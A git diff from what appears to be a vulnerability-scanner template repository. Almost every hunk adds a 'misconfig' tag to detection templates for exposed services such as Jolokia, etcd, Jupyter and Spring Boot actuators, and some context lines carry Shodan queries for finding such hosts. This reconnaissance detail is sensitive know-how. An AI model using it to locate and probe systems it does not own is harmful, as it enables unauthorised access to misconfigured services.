method: GET diff --git a/http/misconfiguration/jetty-showcontexts-enable.yaml b/http/misconfiguration/jetty-showcontexts-enable.yaml index 514eb3ba6a..77aaec7f7d 100644 --- a/http/misconfiguration/jetty-showcontexts-enable.yaml +++ b/http/misconfiguration/jetty-showcontexts-enable.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml - tags: jetty + tags: jetty,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml index 7d260e253f..3f5e0f5df7 100644 --- a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml +++ b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml @@ -7,7 +7,7 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,mbean,tomcat + tags: jolokia,springboot,mbean,tomcat,misconfig metadata: max-request: 16 diff --git a/http/misconfiguration/jolokia/jolokia-list.yaml b/http/misconfiguration/jolokia/jolokia-list.yaml index 98e9a43347..88a589a2b3 100644 --- a/http/misconfiguration/jolokia/jolokia-list.yaml +++ b/http/misconfiguration/jolokia/jolokia-list.yaml @@ -7,7 +7,7 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,tomcat + tags: jolokia,springboot,tomcat,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml index dfc08f6a41..46610a30cd 100644 --- a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml +++ b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml @@ -7,7 +7,7 @@ info: reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit - tags: jolokia,springboot,mbean,tomcat + tags: jolokia,springboot,mbean,tomcat,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml b/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml index dc98a5e208..0ed076d493 100644 --- a/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml +++ b/http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: jolokia,springboot,tomcat,lfi + tags: jolokia,springboot,tomcat,lfi,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/jupyter-ipython-unauth.yaml b/http/misconfiguration/jupyter-ipython-unauth.yaml index e116c0d7c5..d94192f092 100644 --- a/http/misconfiguration/jupyter-ipython-unauth.yaml +++ b/http/misconfiguration/jupyter-ipython-unauth.yaml @@ -9,7 +9,7 @@ info: cvss-score: 10.0 cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cwe-id: CWE-288 - tags: unauth,jupyter + tags: unauth,jupyter,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubeflow-dashboard-unauth.yaml b/http/misconfiguration/kubeflow-dashboard-unauth.yaml index 4ba347848e..3cfefc8e41 100644 --- a/http/misconfiguration/kubeflow-dashboard-unauth.yaml +++ b/http/misconfiguration/kubeflow-dashboard-unauth.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/kubeflow/kubeflow - tags: kubeflow,unauth + tags: kubeflow,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml index ae72f8589c..0a34a584e0 100644 --- a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml @@ -7,7 +7,7 @@ info: description: Information Disclosure of Garbage Collection reference: - https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes - tags: kubernetes,exposure,devops + tags: kubernetes,exposure,devops,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubernetes/kubernetes-pods.yaml b/http/misconfiguration/kubernetes/kubernetes-pods.yaml index aa6e146225..4f0bad303e 100644 --- a/http/misconfiguration/kubernetes/kubernetes-pods.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-pods.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/officialhocc/Kubernetes-Kubelet-RCE - https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/ - tags: k8,unauth,kubernetes,devops + tags: k8,unauth,kubernetes,devops,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml index b7f2576861..bb0dd8de6c 100644 --- a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: medium description: Information Disclosure of Kubernetes Resource Report - tags: kubernetes,exposure + tags: kubernetes,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubernetes/unauth-etcd-server.yaml b/http/misconfiguration/kubernetes/unauth-etcd-server.yaml index 365506c7a5..f2eabd0eb8 100644 --- a/http/misconfiguration/kubernetes/unauth-etcd-server.yaml +++ b/http/misconfiguration/kubernetes/unauth-etcd-server.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: product:"etcd" - tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous + tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous,misconfig http: - method: GET diff --git a/http/misconfiguration/laravel-debug-error.yaml b/http/misconfiguration/laravel-debug-error.yaml index d667c6fd8b..6792fe9f93 100644 --- a/http/misconfiguration/laravel-debug-error.yaml +++ b/http/misconfiguration/laravel-debug-error.yaml @@ -4,7 +4,7 @@ info: name: Larvel Debug Method Enabled author: dhiyaneshDK severity: medium - tags: debug,laravel + tags: debug,laravel,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index 76fb2bdbba..9202b6dd16 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Libvirt" - tags: libvirt,exposure,debug + tags: libvirt,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml index a6a140f7c6..40f0ada3b8 100644 --- a/http/misconfiguration/liferay/liferay-api.yaml +++ b/http/misconfiguration/liferay/liferay-api.yaml @@ -9,7 +9,7 @@ info: verified: true shodan-query: title:"Liferay" reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java - tags: liferay,exposure,api + tags: liferay,exposure,api,misconfig http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index f764f1a949..7103a00be8 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: title:"Liferay" - tags: liferay,exposure,api + tags: liferay,exposure,api,misconfig http: - method: GET diff --git a/http/misconfiguration/linkerd-ssrf-detect.yaml b/http/misconfiguration/linkerd-ssrf-detect.yaml index 8c1fe334cf..cd505c8314 100644 --- a/http/misconfiguration/linkerd-ssrf-detect.yaml +++ b/http/misconfiguration/linkerd-ssrf-detect.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://twitter.com/nirvana_msu/status/1084144955034165248 - tags: ssrf,linkerd,oast + tags: ssrf,linkerd,oast,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/lvm-exporter-metrics.yaml b/http/misconfiguration/lvm-exporter-metrics.yaml index 3f98e5185a..33c448eb6c 100644 --- a/http/misconfiguration/lvm-exporter-metrics.yaml +++ b/http/misconfiguration/lvm-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"LVM Exporter" - tags: lvm,exposure,debug + tags: lvm,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/manage-engine-ad-search.yaml b/http/misconfiguration/manage-engine-ad-search.yaml index c1c0263a7e..db33cd956c 100644 --- a/http/misconfiguration/manage-engine-ad-search.yaml +++ b/http/misconfiguration/manage-engine-ad-search.yaml @@ -5,7 +5,7 @@ info: author: PR3R00T severity: high description: Manage Engine AD Manager service can be configured to allow anonymous users to browse the AD list remotely. - tags: unauth + tags: unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/mlflow-unauth.yaml b/http/misconfiguration/mlflow-unauth.yaml index e98c28d34c..10f00eb20f 100644 --- a/http/misconfiguration/mlflow-unauth.yaml +++ b/http/misconfiguration/mlflow-unauth.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"mlflow" - tags: unauth,mlflow,oss + tags: unauth,mlflow,oss,misconfig http: - method: GET diff --git a/http/misconfiguration/mongodb-exporter-metrics.yaml b/http/misconfiguration/mongodb-exporter-metrics.yaml index 6c68135daa..7456b8b552 100644 --- a/http/misconfiguration/mongodb-exporter-metrics.yaml +++ b/http/misconfiguration/mongodb-exporter-metrics.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 reference: - https://github.com/percona/mongodb_exporter - tags: mongodb,exposure,debug + tags: mongodb,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/namedprocess-exporter-metrics.yaml b/http/misconfiguration/namedprocess-exporter-metrics.yaml index 8d3a22df6b..5f816d4696 100644 --- a/http/misconfiguration/namedprocess-exporter-metrics.yaml +++ b/http/misconfiguration/namedprocess-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Named Process Exporter" - tags: namedprocess,exposure,debug + tags: namedprocess,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/nextcloud-install.yaml b/http/misconfiguration/nextcloud-install.yaml index 470fee01e3..611cab5ae2 100644 --- a/http/misconfiguration/nextcloud-install.yaml +++ b/http/misconfiguration/nextcloud-install.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html - tags: tech,nextcloud,storage + tags: tech,nextcloud,storage,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/node-exporter-metrics.yaml b/http/misconfiguration/node-exporter-metrics.yaml index 4fd24a463a..712d75131a 100644 --- a/http/misconfiguration/node-exporter-metrics.yaml +++ b/http/misconfiguration/node-exporter-metrics.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: node,exposure,debug + tags: node,exposure,debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/nomad-jobs.yaml b/http/misconfiguration/nomad-jobs.yaml index 2489c4e63f..09a80a8e7e 100644 --- a/http/misconfiguration/nomad-jobs.yaml +++ b/http/misconfiguration/nomad-jobs.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: nomad,devops,hashicorp,panel + tags: nomad,devops,hashicorp,panel,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/office365-open-redirect.yaml b/http/misconfiguration/office365-open-redirect.yaml index 8641fc31c6..af833d561c 100644 --- a/http/misconfiguration/office365-open-redirect.yaml +++ b/http/misconfiguration/office365-open-redirect.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,office365,microsoft + tags: redirect,office365,microsoft,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml b/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml index 2421da8534..405f1bb4aa 100644 --- a/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml +++ b/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:1550906681 - tags: ssrf,oast,openbmcs,edb + tags: ssrf,oast,openbmcs,edb,misconfig http: - raw: diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index a24f47c33a..5c3330f429 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"PgHero" - tags: exposure,panel,pghero + tags: exposure,panel,pghero,misconfig http: - method: GET diff --git a/http/misconfiguration/php-errors.yaml b/http/misconfiguration/php-errors.yaml index 345aa64d8a..715995b354 100644 --- a/http/misconfiguration/php-errors.yaml +++ b/http/misconfiguration/php-errors.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"PHP warning" || "Fatal error" - tags: debug,php + tags: debug,php,misconfig http: - method: GET diff --git a/http/misconfiguration/php-fpm-status.yaml b/http/misconfiguration/php-fpm-status.yaml index b0ef6e2c8a..dd1129e4fb 100644 --- a/http/misconfiguration/php-fpm-status.yaml +++ b/http/misconfiguration/php-fpm-status.yaml @@ -4,7 +4,7 @@ info: name: PHP-FPM Status author: geeknik severity: info - tags: config + tags: config,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/php-src-disclosure.yaml b/http/misconfiguration/php-src-disclosure.yaml index 158a0b15f4..f74dfbe3f0 100644 --- a/http/misconfiguration/php-src-disclosure.yaml +++ b/http/misconfiguration/php-src-disclosure.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-540 - tags: php,phpcli,diclosure + tags: php,phpcli,diclosure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/pinpoint-unauth.yaml b/http/misconfiguration/pinpoint-unauth.yaml index 2958cd8f0d..f35557d0b3 100644 --- a/http/misconfiguration/pinpoint-unauth.yaml +++ b/http/misconfiguration/pinpoint-unauth.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/pinpoint-apm/pinpoint - tags: pippoint,unauth + tags: pippoint,unauth,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/postgres-exporter-metrics.yaml b/http/misconfiguration/postgres-exporter-metrics.yaml index 4fec01db38..1a60b3097b 100644 --- a/http/misconfiguration/postgres-exporter-metrics.yaml +++ b/http/misconfiguration/postgres-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Postgres exporter" - tags: postgres,exposure,debug + tags: postgres,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/private-key-exposure.yaml b/http/misconfiguration/private-key-exposure.yaml index a20ad153ac..25b48cb168 100644 --- a/http/misconfiguration/private-key-exposure.yaml +++ b/http/misconfiguration/private-key-exposure.yaml @@ -5,7 +5,7 @@ info: author: aashiq severity: high description: Searches for private key exposure by attempting to query the helper endpoint on node_modules - tags: exposure,node + tags: exposure,node,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-config.yaml b/http/misconfiguration/prometheus/prometheus-config.yaml index e59fe2ce1c..4a7d52b3ad 100644 --- a/http/misconfiguration/prometheus/prometheus-config.yaml +++ b/http/misconfiguration/prometheus/prometheus-config.yaml @@ -8,7 +8,7 @@ info: credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,config + tags: prometheus,config,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-exporter.yaml b/http/misconfiguration/prometheus/prometheus-exporter.yaml index 7c1677d9f2..f0e3bd5e94 100644 --- a/http/misconfiguration/prometheus/prometheus-exporter.yaml +++ b/http/misconfiguration/prometheus/prometheus-exporter.yaml @@ -7,7 +7,7 @@ info: description: Prometheus exporter detector reference: - https://github.com/prometheus/prometheus/wiki/Default-port-allocations - tags: prometheus + tags: prometheus,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-flags.yaml b/http/misconfiguration/prometheus/prometheus-flags.yaml index 5b2256ae03..fbe63814b6 100644 --- a/http/misconfiguration/prometheus/prometheus-flags.yaml +++ b/http/misconfiguration/prometheus/prometheus-flags.yaml @@ -7,7 +7,7 @@ info: description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,leak + tags: prometheus,leak,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-log.yaml b/http/misconfiguration/prometheus/prometheus-log.yaml index bf7783af80..78cfcda884 100644 --- a/http/misconfiguration/prometheus/prometheus-log.yaml +++ b/http/misconfiguration/prometheus/prometheus-log.yaml @@ -4,7 +4,7 @@ info: name: Exposed Prometheus author: dhiyaneshDK severity: low - tags: prometheus + tags: prometheus,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/prometheus/prometheus-targets.yaml b/http/misconfiguration/prometheus/prometheus-targets.yaml index cf603c496a..590a073338 100644 --- a/http/misconfiguration/prometheus/prometheus-targets.yaml +++ b/http/misconfiguration/prometheus/prometheus-targets.yaml @@ -9,7 +9,7 @@ info: data in these labels, oftentimes without the developer's knowledge. reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus + tags: prometheus,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/put-method-enabled.yaml b/http/misconfiguration/put-method-enabled.yaml index a4b01e5096..e67c4619f1 100644 --- a/http/misconfiguration/put-method-enabled.yaml +++ b/http/misconfiguration/put-method-enabled.yaml @@ -9,7 +9,7 @@ info: other attacks. reference: - https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled - tags: injection + tags: injection,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml index 65d6cc9a97..33c9dabef0 100644 --- a/http/misconfiguration/python-metrics.yaml +++ b/http/misconfiguration/python-metrics.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: html:"python_gc_objects_collected_total" - tags: exposure,devops,python + tags: exposure,devops,python,misconfig http: - method: GET diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index f4e76135b7..0dcf11311e 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"RabbitMQ Exporter" - tags: rabbitmq,exposure,debug + tags: rabbitmq,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/rack-mini-profiler.yaml b/http/misconfiguration/rack-mini-profiler.yaml index 0b3c4a5d07..44c9bbcbb6 100644 --- a/http/misconfiguration/rack-mini-profiler.yaml +++ b/http/misconfiguration/rack-mini-profiler.yaml @@ -5,7 +5,7 @@ info: author: vzamanillo severity: high description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks. - tags: config,debug,rails + tags: config,debug,rails,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/salesforce-aura.yaml b/http/misconfiguration/salesforce-aura.yaml index 165d8b3263..54ccbaa7a1 100644 --- a/http/misconfiguration/salesforce-aura.yaml +++ b/http/misconfiguration/salesforce-aura.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: aura,unauth,salesforce,exposure + tags: aura,unauth,salesforce,exposure,misconfig metadata: max-request: 5 diff --git a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml index 1f47562ef1..7f2d3a6931 100644 --- a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml +++ b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: sap + tags: sap,misconfig http: - method: GET diff --git a/http/misconfiguration/server-status-localhost.yaml b/http/misconfiguration/server-status-localhost.yaml index 41eadf0b82..df60fe4dbf 100644 --- a/http/misconfiguration/server-status-localhost.yaml +++ b/http/misconfiguration/server-status-localhost.yaml @@ -4,7 +4,7 @@ info: name: Server Status Disclosure author: pdteam,geeknik severity: low - tags: apache,debug + tags: apache,debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/service-pwd.yaml b/http/misconfiguration/service-pwd.yaml index 4cec98b01f..17757f869a 100644 --- a/http/misconfiguration/service-pwd.yaml +++ b/http/misconfiguration/service-pwd.yaml @@ -7,7 +7,7 @@ info: description: service.pwd was discovered, which is likely to contain sensitive information. reference: - https://www.exploit-db.com/ghdb/7256 - tags: exposure,listing,service,edb + tags: exposure,listing,service,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/setup-github-enterprise.yaml index 098a5cce86..1b0d1811b0 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/setup-github-enterprise.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1373456171 - tags: panel,exposure,setup,github + tags: panel,exposure,setup,github,misconfig http: - method: GET diff --git a/http/misconfiguration/sitecore-debug-page.yaml b/http/misconfiguration/sitecore-debug-page.yaml index e9a7cd57d2..250864a7a5 100644 --- a/http/misconfiguration/sitecore-debug-page.yaml +++ b/http/misconfiguration/sitecore-debug-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to Sitecore" - tags: debug,sitecore + tags: debug,sitecore,misconfig http: - method: GET diff --git a/http/misconfiguration/sitecore-lfi.yaml b/http/misconfiguration/sitecore-lfi.yaml index 74857e0a2e..7eae20ad6f 100644 --- a/http/misconfiguration/sitecore-lfi.yaml +++ b/http/misconfiguration/sitecore-lfi.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Sitecore" - tags: sitecore,lfi + tags: sitecore,lfi,misconfig http: - method: GET diff --git a/http/misconfiguration/solr-query-dashboard.yaml b/http/misconfiguration/solr-query-dashboard.yaml index 3c6c53b990..dd9f50a93b 100644 --- a/http/misconfiguration/solr-query-dashboard.yaml +++ b/http/misconfiguration/solr-query-dashboard.yaml @@ -7,7 +7,7 @@ info: description: Solr's admin page was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5856 - tags: solr,unauth,edb + tags: solr,unauth,edb,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/spidercontrol-scada-server-info.yaml b/http/misconfiguration/spidercontrol-scada-server-info.yaml index 555c09deac..12425346e1 100644 --- a/http/misconfiguration/spidercontrol-scada-server-info.yaml +++ b/http/misconfiguration/spidercontrol-scada-server-info.yaml @@ -7,7 +7,7 @@ info: description: SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. reference: - https://spidercontrol.net/spidercontrol-inside/ - tags: spidercontrol,scada,exposure + tags: spidercontrol,scada,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/springboot/springboot-autoconfig.yaml b/http/misconfiguration/springboot/springboot-autoconfig.yaml index 5b0f8b3011..234ebfacb7 100644 --- a/http/misconfiguration/springboot/springboot-autoconfig.yaml +++ b/http/misconfiguration/springboot/springboot-autoconfig.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-beans.yaml b/http/misconfiguration/springboot/springboot-beans.yaml index 966ffc1563..bdca65d657 100644 --- a/http/misconfiguration/springboot/springboot-beans.yaml +++ b/http/misconfiguration/springboot/springboot-beans.yaml @@ -5,7 +5,7 @@ info: author: ajaysenr severity: low description: Displays a complete list of all the Spring beans in the application - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-configprops.yaml b/http/misconfiguration/springboot/springboot-configprops.yaml index a3cc0642e7..65df3dff42 100644 --- a/http/misconfiguration/springboot/springboot-configprops.yaml +++ b/http/misconfiguration/springboot/springboot-configprops.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Sensitive environment variables may not be masked - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-dump.yaml b/http/misconfiguration/springboot/springboot-dump.yaml index e39da1e14b..5719fb3b15 100644 --- a/http/misconfiguration/springboot/springboot-dump.yaml +++ b/http/misconfiguration/springboot/springboot-dump.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Performs a thread dump - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-gateway.yaml b/http/misconfiguration/springboot/springboot-gateway.yaml index 207a2d1114..ce528c8ca3 100644 --- a/http/misconfiguration/springboot/springboot-gateway.yaml +++ b/http/misconfiguration/springboot/springboot-gateway.yaml @@ -7,7 +7,7 @@ info: description: Sensitive environment variables may not be masked reference: - https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-health.yaml b/http/misconfiguration/springboot/springboot-health.yaml index 6948362945..b455d4cc05 100644 --- a/http/misconfiguration/springboot/springboot-health.yaml +++ b/http/misconfiguration/springboot/springboot-health.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-heapdump.yaml b/http/misconfiguration/springboot/springboot-heapdump.yaml index f1bc25c129..1ff74d04f9 100644 --- a/http/misconfiguration/springboot/springboot-heapdump.yaml +++ b/http/misconfiguration/springboot/springboot-heapdump.yaml @@ -7,7 +7,7 @@ info: description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. reference: - https://github.com/pyn3rd/Spring-Boot-Vulnerability - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-httptrace.yaml b/http/misconfiguration/springboot/springboot-httptrace.yaml index cca102bcc2..795b25dcca 100644 --- a/http/misconfiguration/springboot/springboot-httptrace.yaml +++ b/http/misconfiguration/springboot/springboot-httptrace.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-info.yaml b/http/misconfiguration/springboot/springboot-info.yaml index d9b8089c60..afe6df383e 100644 --- a/http/misconfiguration/springboot/springboot-info.yaml +++ b/http/misconfiguration/springboot/springboot-info.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: springboot + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-loggers.yaml b/http/misconfiguration/springboot/springboot-loggers.yaml index 4612e17e0c..85408ca4ac 100644 --- a/http/misconfiguration/springboot/springboot-loggers.yaml +++ b/http/misconfiguration/springboot/springboot-loggers.yaml @@ -4,7 +4,7 @@ info: name: Detect Springboot Loggers author: that_juan_,dwisiswant0,wdahlenb severity: low - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-mappings.yaml b/http/misconfiguration/springboot/springboot-mappings.yaml index 40508d9990..17f602c958 100644 --- a/http/misconfiguration/springboot/springboot-mappings.yaml +++ b/http/misconfiguration/springboot/springboot-mappings.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Additional routes may be displayed - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-metrics.yaml b/http/misconfiguration/springboot/springboot-metrics.yaml index f46ea7f668..4920f564f2 100644 --- a/http/misconfiguration/springboot/springboot-metrics.yaml +++ b/http/misconfiguration/springboot/springboot-metrics.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Additional routes may be displayed - tags: springboot,exposure + tags: springboot,exposure,misconfig metadata: max-request: 2 diff --git 